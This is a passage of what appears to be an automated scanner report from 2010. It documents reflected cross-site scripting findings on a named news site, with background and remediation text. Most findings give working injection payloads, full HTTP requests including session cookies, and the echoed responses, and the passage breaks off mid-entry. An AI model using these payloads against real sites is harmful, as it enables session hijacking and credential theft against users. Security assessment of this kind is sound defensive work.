Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.technewsdaily.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51f8f'-alert(1)-'aecd03e5b1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?51f8f'-alert(1)-'aecd03e5b1d=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 01:21:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=337300fhdohitef3l36rqgdho5; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 01:21:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40404
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/?51f8f'-alert(1)-'aecd03e5b1d=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81650'-alert(1)-'6466bcff7f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010-top-social-network-screw-ups-183281650'-alert(1)-'6466bcff7f0/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40474
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/2010-top-social-network-screw-ups-183281650'-alert(1)-'6466bcff7f0/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.3. http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/2010-top-social-network-screw-ups-1832/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cb8c"><a>756a7e7e28c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2010-top-social-network-screw-ups-1832/?6cb8c"><a>756a7e7e28c=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 69281
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/?6cb8c"><a>756a7e7e28c=1/" /> ...[SNIP]...
1.4. http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/2010-top-social-network-screw-ups-1832/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9049b'-alert(1)-'9d59cbaec90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010-top-social-network-screw-ups-1832/?9049b'-alert(1)-'9d59cbaec90=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68919
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/?9049b'-alert(1)-'9d59cbaec90=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631de'-alert(1)-'8880f75d525 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /65-3d-hdtv-for-members-only-1830631de'-alert(1)-'8880f75d525/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:25 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40462
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830631de'-alert(1)-'8880f75d525/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.6. http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/65-3d-hdtv-for-members-only-1830/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f066'-alert(1)-'1b2ef93fe7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /65-3d-hdtv-for-members-only-1830/?9f066'-alert(1)-'1b2ef93fe7a=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:16 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63610
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/?9f066'-alert(1)-'1b2ef93fe7a=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.7. http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/65-3d-hdtv-for-members-only-1830/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 297ea"><a>9214693a572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /65-3d-hdtv-for-members-only-1830/?297ea"><a>9214693a572=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63972
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/?297ea"><a>9214693a572=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67f27'-alert(1)-'67b6821b517 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about-us67f27'-alert(1)-'67b6821b517/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40414
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/about-us67f27'-alert(1)-'67b6821b517/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.9. http://www.technewsdaily.com/about-us/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/about-us/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b383'-alert(1)-'f79fccaf2ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about-us/?4b383'-alert(1)-'f79fccaf2ba=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:19 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38777
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/about-us/?4b383'-alert(1)-'f79fccaf2ba=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9bd6'-alert(1)-'a1e0d97980d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /android-30-honeycomb-appears-on-motorola-tablet-1762d9bd6'-alert(1)-'a1e0d97980d/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:46 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40502
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762d9bd6'-alert(1)-'a1e0d97980d/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.11. http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc8f"><a>f10d2117251 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /android-30-honeycomb-appears-on-motorola-tablet-1762/?4dc8f"><a>f10d2117251=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:21 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63019
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/?4dc8f"><a>f10d2117251=1/" /> ...[SNIP]...
1.12. http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c73f8'-alert(1)-'f4a2f9a0cac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /android-30-honeycomb-appears-on-motorola-tablet-1762/?c73f8'-alert(1)-'f4a2f9a0cac=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62657
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/?c73f8'-alert(1)-'f4a2f9a0cac=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28c0f'-alert(1)-'83bad171cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
